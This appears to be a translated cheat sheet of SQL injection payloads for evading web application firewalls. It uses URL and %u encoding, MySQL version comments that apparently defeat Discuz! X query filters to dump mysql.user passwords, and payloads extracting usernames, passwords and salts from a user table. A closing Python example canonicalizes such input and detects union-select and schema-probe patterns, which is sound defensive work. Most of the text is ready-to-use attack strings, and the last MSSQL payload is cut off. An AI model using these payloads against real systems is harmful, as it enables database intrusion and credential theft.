A Summary of WAF Bypass Methods
I. Bypasses using various encodings
1. URL encoding
?id=1 union select pass from admin limit 1
?id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31
2. Unicode encoding
'e' => '%u0065', // this is its Unicode (%u) encoding
?id=1 union select pass from admin limit 1
?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1
3. Bypassing the built-in _do_query_safe() of Discuz! X
gid=1 and 1=2 union select 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user    (blocked)
gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user    (bypasses Discuz! X2.0)
gid=@`'` union select @`'`,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14 from mysql.user    (bypasses Discuz! X2.5)
gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`    (bypasses the second Discuz! X2.5 patch)
Here I introduced `'` to hide the first @ character, and replaced the first @`'` with @`''`, so that the second @ can then be replaced as well.
4. Bypassing a certain WAF (by Havij)
/*!30000union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 10,1),null,null,null,null*/--
list.php?yw=bj&id=3&id=1 /*!30000union all select (select concat(0x27,uid,0x5e,username,0x5e,password,0x5e,email,0x5e,salt,0x27) from `gs_ucenter`.uc_members limit 0,1) ,null,null,null,null*/--
5. Notes from one test
newsid=60+a%nd%201=(se%lect%20@@VERSION)--
newsid=60+a%nd%201=(se%lect%20@@servername)--
newsid=60+a%nd 1=(se%lect name f%rom mas%ter.dbo.sysd%atabases wh%ere dbid=1)--
newsid=60+a%nd (se%lect t%o%p 1 name f%rom pedaohang.d%b%o.s%ys%obje%cts where xtype='U' a%nd name not in (se%lect top 1 name fr%om
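Added example (not from the original notes): the canonicalization step a WAF or log-analysis rule should apply before keyword matching, so that the URL-encoded and %u-encoded forms from sections 1 and 2, the /*!50000 */ version comment from section 3 and the broken %-escapes from section 5 all reduce to the same string. The sample inputs are the page's own payloads; treating a stray '%' as dropped is an assumption about how legacy ASP request parsing behaves.

```python
import re
from urllib.parse import unquote_plus

# Constructed samples: the plain payload from section 1 and its two encoded forms.
PLAIN = "?id=1 union select pass from admin limit 1"
URL_ENCODED = ("?id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73"
               "%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31")
UNICODE_ENCODED = "?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1"


def decode_once(s: str) -> str:
    # IIS-style %uXXXX escapes (not handled by urllib) become the code point.
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    # Assumption: a '%' that starts no valid escape is dropped, as some legacy
    # ASP parsers do ("a%nd" -> "and"); modelling it closes that matching gap.
    s = re.sub(r"%(?![0-9a-fA-F]{2})", "", s)
    return unquote_plus(s)


def canonicalize(s: str) -> str:
    # Decode until stable so double-encoded input is unwrapped as well.
    for _ in range(3):
        decoded = decode_once(s)
        if decoded == s:
            break
        s = decoded
    # MySQL executes the body of a version comment: /*!50000select*/ -> select
    s = re.sub(r"/\*!\d*\s*(.*?)\s*\*/", r"\1", s, flags=re.S)
    # Ordinary comments only separate tokens, so they become whitespace.
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).strip().lower()


RULES = {
    "union-select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "select-subquery": re.compile(r"\(\s*select\b"),
    "schema-probe": re.compile(r"\b(?:information_schema|mysql\.user)\b"),
}


def detect(raw: str) -> list:
    """Return the names of the rules that match the canonical form of a query."""
    canon = canonicalize(raw)
    return [name for name, rx in RULES.items() if rx.search(canon)]


if __name__ == "__main__":
    for sample in (PLAIN, URL_ENCODED, UNICODE_ENCODED):
        print(canonicalize(sample), detect(sample))
```

Matching on the canonical form rather than the raw request is what makes the three forms of the section 1 payload indistinguishable to the rule set.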